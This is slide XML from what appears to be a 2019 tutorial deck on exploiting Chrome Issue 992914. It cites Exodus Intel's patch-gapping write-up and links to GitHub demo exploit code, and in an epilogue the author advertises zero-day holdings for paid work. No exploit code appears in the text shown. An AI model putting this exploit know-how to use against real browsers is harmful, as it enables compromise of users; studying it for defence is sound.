              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3612381" y="2257263"/>
            <a:ext cx="4273392" cy="2343473"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="직사각형 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3F24D24-C10A-4B54-BB12-402A07D0A952}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4277933" y="3979611"/>
            <a:ext cx="2942287" cy="309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7CF619F9-FC3E-4F80-8698-4E10375EFD24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3349470" y="4675752"/>
            <a:ext cx="4799215" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This feature is missing in d8.exe. However, commenting affects padding.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1100">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="직선 화살표 연결선 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4660E3B-8C57-4B22-99B9-0FFB9FFA0A62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9" idx="0"/>
            <a:endCxn id="6" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5749077" y="4289368"/>
            <a:ext cx="1" cy="38638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B3B4AD78-87EE-4479-BB20-FFA3A76667F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3875941" y="5435043"/>
            <a:ext cx="3746269" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Now it's time to check out the demo ..!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="슬라이드 번호 개체 틀 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86DBE076-6810-435B-AE1B-F35818CEA8D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F3ECD9F8-CFA2-4FC9-86A0-B66D202A3856}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="날짜 개체 틀 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4AA1A4D-B330-4D20-AB05-A5F46E86F915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F377EE85-ADD7-47E4-8A8B-14763BAC53E2}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-11-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1409223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0278" y="129722"/>
            <a:ext cx="461665" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADA497E1-B000-4529-A911-08A8FFDC8F2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611942" y="129722"/>
            <a:ext cx="6890983"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DEMO</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="bandicam 2019-11-28 20-28-11-836">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB74829F-0FAA-4944-A694-603BD445056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23679" y="857866"/>
            <a:ext cx="6291800" cy="5485485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A10D62F-A1C0-4ED0-81D8-120D93438BAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276521" y="3231277"/>
            <a:ext cx="4874885" cy="7386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a:t>I have attached a video demo file. Play it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>The demo code is stored on the following GitHub.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://github.com/amesianx/Chrome_Issue992914</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="슬라이드 번호 개체 틀 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EFA3BE0-DE4E-436E-A4BA-D410413850C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F3ECD9F8-CFA2-4FC9-86A0-B66D202A3856}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="날짜 개체 틀 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{221BDB58-4051-4D9D-9BDE-B22F64292E94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{46B92D26-E38A-4932-8B4C-386CA2B69FFC}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-11-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="72370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8" y="866181"/>
            <a:ext cx="11773257" cy="3647152"/>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sz="1100"/>
              <a:t>I am a freelancer without a job.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>I have two Microsoft Office zero-days and one global server remote zero-day.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>Of course, it's a paid commercial project, so its contents can never be made public.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>(One vulnerability was discovered and publicly disclosed by the other global team.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>I led and worked as a team leader all three times.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>In addition, as a security research engineer, I did a lot of vulnerability analysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>My main interests are "zero-day", "DBI(libtriton/angr/frida/pintools/dynamorio Etc. All about the kind of automatic instrument)", "Decompiler(retdec or LLVM/QEMU Etc)", "All about the kind of Static and Dynamic Analysis“. However, it is also interesting to analyze the one-day and convert the one-day to another device.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>We also perform software vulnerability analysis on embedded devices.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>We do not do short term projects. We only do long term research of annual contracts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>We have a corporate company that may soon be out of business due to financial problems. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>I don't have a job as a company, but I work as a freelancer through that company.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>We are already working on an annual project, but we are not sure if our customers will give us the project next year.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>Please contact us if you would like to have a project.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>I can't hear or speak English, but reading or writing in English like this ppt document is no problem.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>I dedicate this ppt to beginners who are just beginning to study browser hacking.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>There are many more difficult things than this technical paper. However, making the document in English is too hard.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>If I have a chance later, I'll make another document.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>This document is not a presentation document, it is only a personal hobby and is distributed only online.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>I don't know if the message in this document was delivered to you properly because I'm not good at English.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>Thank you.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADA497E1-B000-4529-A911-08A8FFDC8F2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611942" y="129722"/>
            <a:ext cx="1687913"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Epilogue</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="슬라이드 번호 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5894B7C4-C33F-47C8-BEA1-C70820F99974}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F3ECD9F8-CFA2-4FC9-86A0-B66D202A3856}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="날짜 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18A4B45D-5888-4F5F-96C0-012CE65BC8F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{624B5EC5-F45E-4B0E-9FDE-5E17DB9B4A86}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-11-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3714539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부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59F90111-63B8-4285-9443-3BF624BE51DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422029" y="4904497"/>
            <a:ext cx="7343338" cy="610117"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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050">
                <a:solidFill>
                  <a:srgbClr val="FBDD6D"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:ea typeface="Intel Clear" panose="020B0604020203020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>GNUSYSLAB Research and Development Groups in the powerhacker.net.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="FBDD6D"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:ea typeface="Intel Clear" panose="020B0604020203020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Author : amesianx@gmail.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16D8C5E6-77E7-4B5E-B805-5938AB09C807}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7174521" y="2767675"/>
            <a:ext cx="4775981" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"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Gnusys is Not a Unix System for Your Secret</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{230CD8E3-1718-404E-A3FD-697242B451DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422029" y="4381277"/>
            <a:ext cx="7343338" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="28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Thank you for reading this occult document</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="234683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962403-B5F4-4A33-9B04-6662D25D9260}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611943" y="129722"/>
            <a:ext cx="1878594"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Background</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRP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7" y="866181"/>
            <a:ext cx="10166801" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="16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The following is an explanation from blog.exodusintel.com.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="16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I could not understand what these guys were saying. Too hard to understand with my brain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="16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If you want to see it, check out the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://blog.exodusintel.com/2019/09/09/patch-gapping-chrome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="16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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="그림 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86CA9B60-90DA-4967-A96C-D8F4E541A5A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1024557" y="1784993"/>
            <a:ext cx="5015297" cy="3223691"/>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49" name="TextBox 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1577D810-F603-4F20-98DF-F4ED63354E7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="150278" y="5441859"/>
            <a:ext cx="10022422" cy="33855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ExodusIntel also published exploit code on github that runs on 64bit Windows Chrome Browser.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50" name="그림 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD1A0671-8152-4D26-A7A5-8E4348427730}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7100620" y="1784993"/>
            <a:ext cx="4011880" cy="3223691"/>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51" name="직사각형 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C56D3ABF-717B-4EAA-A4F9-3DE3BCACF8AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1446708" y="5007414"/>
            <a:ext cx="4170994" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://blog.exodusintel.com/2019/09/09/patch-gapping-chrome</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52" name="직사각형 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDDEB0AB-5116-434D-B3C3-3D9D1358A992}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
